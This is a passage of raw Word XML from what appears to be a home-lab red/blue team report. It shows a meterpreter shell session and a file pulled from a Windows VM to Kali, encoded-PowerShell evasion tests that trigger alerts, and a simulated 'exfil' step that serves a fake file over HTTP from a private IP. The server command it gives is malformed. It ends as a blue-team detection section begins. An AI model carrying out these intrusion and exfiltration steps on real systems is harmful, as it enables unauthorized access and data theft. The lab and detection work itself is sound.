        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE310DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A50F4D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5730240" cy="2665730"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="19" name="Picture 19" descr="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xploit"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5730240" cy="2665730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7EF397">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc2044"/>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meterpreter shell being opened</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="32B1348A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="1260" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Now try to download any file from windows desktop to kali ,exploit is successfully done, check logs in windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541C702D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5728335" cy="826770"/>
            <wp:effectExtent l="0" t="0" r="1905" b="11430"/>
            <wp:docPr id="21" name="Picture 21" descr="in exploit phases add this last download file from windows to k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n exploit phases add this last download file from windows to kali"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5728335" cy="826770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1719D8">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc4032"/>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6</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a file being downloaded from windows to kali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DA28BD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc16172"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Evasion Tests</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="358DD4C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="1260" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Open Windows VM  PowerShell in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Administrator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> mode </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ECB163">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="1260" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">The log script checks for terms like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">evasion/encoded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">(see </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l "_APPENDIX A" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>APPENDIX A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A313218">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="1260" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>The below commands include the use of encoded and hence triggered an alert for an evasion test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61276849">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5729605" cy="821055"/>
            <wp:effectExtent l="0" t="0" r="635" b="1905"/>
            <wp:docPr id="5" name="Picture 5" descr="evasion mock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vasion mock windows"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5729605" cy="821055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDD1FED">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc1761"/>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7</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commands for Test Evasion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="1F562506">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6196456C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C741F26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CA66C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AF2A9EC">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc25547"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Exfil</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="233BCED0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1260" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a directory in kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>exfil-test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B43D93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1260" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">In side the directory create a file fake.txt which contains  message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“Simulated Exfiltration from kali”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD1F813">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1260" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Start a server at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>python3 -m 192.168.1.53 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5987F55D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1260" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to windows and type : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD08ECA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1440" w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Invoke-Webrequest -Url </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://192.168.1.43:8080/fake.txt" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://192.168.1.43:8080/fake.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Outfile C:\\Users\Windows\Desktop\fake_exfil.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F633D4F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5724525" cy="2668905"/>
            <wp:effectExtent l="0" t="0" r="5715" b="13335"/>
            <wp:docPr id="10" name="Picture 10" descr="smb exfil kal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mb exfil kali-1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724525" cy="2668905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="114BFB4A">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc26533"/>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8</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a file being created and hosted on port 8080</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="76D456CF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5732780" cy="2022475"/>
            <wp:effectExtent l="0" t="0" r="12700" b="4445"/>
            <wp:docPr id="11" name="Picture 11" descr="smb exfil k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mb exfil kali"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5732780" cy="2022475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB2C46F">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc24212"/>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9 Shows file being accessed  and downloaded on windows</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="5AE02A74">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA97ED3">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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc8236"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Blue Team Detection &amp; Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="3BBD5B2C">
      <w:pPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5723255" cy="2399665"/>
            <wp:effectExtent l="0" t="0" r="6985" b="8255"/>
            <wp:docPr id="16" name="Picture 16" descr="csv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sv logs"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5723255" cy="2399665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AED968">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
